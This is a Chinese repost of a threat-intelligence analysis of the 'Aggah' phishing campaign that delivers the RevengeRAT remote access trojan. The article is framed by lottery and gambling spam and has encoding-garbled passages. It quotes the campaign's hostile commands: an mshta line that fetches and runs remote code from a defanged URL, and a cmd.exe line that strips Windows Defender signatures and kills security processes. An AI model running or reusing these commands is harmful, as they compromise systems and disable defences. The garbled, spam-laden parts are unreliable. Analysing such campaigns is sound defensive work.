手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中

利用钓鱼邮件传播RevengeRAT的Aggah行动

来源:本站整理 作者:佚名 时间:2019-04-28 TAG: 我要投稿

2019年3月,Unit 42开始着手研究一起主要针对中东国家的攻击行动。研究分析表明,此项行动可能只是一起更大规模攻击行动的前奏,其目标涉及美欧亚三大洲。
此次攻击行动主要通过鱼叉式网络钓鱼邮件进行传播的,邮件携带了一个附件,在用户打开后,附件会通过模板注入从远程服务器加载一个启用了宏的恶意文件,而此文件?#21482;?#25351;向BlogSpot来获取恶意脚本,并通过该脚本从Pastebin上下载最终?#34892;?#36127;载——RevengeRAT恶意软件。在研究过程中,我们发现了有好几类传播的文档,虽然内容可能有所出入,但都遵循相同的流程,最后都是在用户机器上安装了在Pastebin上托管的RevengeRAT,这表明威胁行为者在整个攻击活动中的TTP(战术、技术和过程)是不变的。
最初,我们推测此项行动可能与Gorgon组织有关,理由有两个:一个是高水平的TTP,二是对RevengeRAT恶意软件的使用。但我们当前还无法获得一些更?#33539;?#24615;的指标与Gorgon组织相匹配,尚且无法将其归因于Gorgon组织。
于是我们决定将此项行动称为Aggah行动,“Aggah”这个名称来源于Pastebin上一个托管RevengeRAT payload的账户名,也是用于分割发送到RevengeRAT C2服务器的数据的分隔符。
传播过程
我们对Aggah行动的研究始于2019年3月27日获取的一封文件,此文件通过电邮的方式发送到了某个中东国家的组织机构手里。这封邮件冒充本国一家大型金融机构的身份,告知用户的“账户被锁定了”。最初,这封文件只出现在了一个国家,在教育、?#25945;?营销和政府垂直部门的机构中出现比?#39318;?#39640;,而在四天后的3月31日,我们看到同样的邮件被发送到了第二个中东国家的某家金融机构。后?#27492;?#30528;时间的推移,更多踪迹逐渐浮出水面,此次行动不仅仅针对中东地区,美国、?#20998;?#21644;亚洲的多个组织机构也同样出现了这份文件的身影,且攻击者针对的目标是教育、?#25945;濉?#25216;术、零售、制造、州/地方政府、?#39057;輟?#21307;?#39057;?#34892;业。由于文件在功能上是相似的,所以我们将描述之前分析的原始样本。
3月27日发送的电子邮件中附带一个Word文档,文件名为“Activity.doc”(SHA256:d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946),打开后会试图通过模板注入加载远程OLE文档,具体过程如下:当打开“Activity.doc”时,会显示图1,诱导用户启用宏,启动条件必须是桌面版本的Microsoft Word,因为宏在Office 365的Word的联机版本中不起作用。“Activity.doc”文件本身不包含宏,但从远程服务器加载的OLE文包含了一个宏。

图1. Activity.doc中用于诱导用户启用宏的截图
Activity.doc分析
此文档使用模板注入来加载托管在远程服务器上的文件。图2显示了文档页脚的内容,它会从hxxps://static.wixstatic [.] com / ugd / 05e470_b104c366c1f7423293887062c7354db2.doc处加载远程OLE文档:

图2.Activity.doc文档页脚,显示了远程OLE文件所在地
加载的OLE文件?#23548;?#19978;是一个RTF文件(SHA256: 5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f),它使用一个经过混淆的宏加载嵌入的Excel文档,宏里包含了大量“垃圾”代码。这个宏的目的是通过“Shell”命令解码并执行下列URL内容:
mshta hxxp://www.bitly[.]com/SmexEaldos3
上面的命令使用了内置的“mshta”应用程序来下载URL所提供的内容,URL是用Bit.ly生成的短链接。由WildFire解析后,短链接会重定向到hxxps://bjm9.blogspot [.] com / p / si.html,如图3中HTTP响应的“Location”字段所示。

图3.短链接,指向Blogspot
图4展示了链?#21448;?#21521;的内容,一篇看起来有点奇怪的BlogSpot文章。

图4.bjm9.blogspot (.]com屏幕截图
通过分析博客上的代码,我们发现它?#23548;噬习?#21547;了一个JavaScript脚本,如图5所示。

图5.嵌入的JavaScript脚本
恶意脚本在植入系统后可执行多个活动。首先,它会试图通过删除签名集来阻止Microsoft Defender。该脚本还能杀死Defender进程以及一些Office应用程序的进程。所有这些都是使用以下命令行执行的:
cmd.exe /c cd “”%ProgramFiles%\Windows Defender”” & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c “”taskkill /f /im MSASCuiL.exe”” & forfiles /c “”taskkill /f /im MpCmdRun.exe”” & exit
接着该脚本会试图禁用Office产品中的安全机制,尤其是通过设置注册表项值来启用宏和禁用ProtectedView。启用Word、PowerPoint和Excel中的宏的操作是通过将某些注册表项(见附?#36857;?#35774;置为值“1”来完成的。
禁用Word、PowerPoint和Excel中的ProtectedView安全机制则是将另一些注册表项(见附?#36857;?#35774;置为“1”。
我们之前的博文中曾讲过Gorgon组织在Office中启用宏和禁用ProtectedView的技术,以及对注册表项顺序的修改。此外,此次行动中中止Windows Defender和Microsoft Office应用程序进程的策略也与Gorgon组织如出一辙,并且Gorgon在之前的攻击行动中也曾用bit.ly缩写URL的行为,虽然存在明显的技术重叠,但仍然缺乏具体的证据表明这次攻击活动与Gorgon有关。托管在Blogspot上的脚本主要执行三个活动,包括:

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.rliwo.live)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱[email protected],我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载
        购买彩票权威网址
        手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中
        比特币交易平台 腾讯1.5分分彩开奖 1980猴幸运数字 轩辕传奇魔宠摇铃 六间房天天在线棋牌 黄金翅膀 那不勒斯四部顺序 天天飞车官网 斗破苍穹小医仙h黄文 蛇和梯子APP下载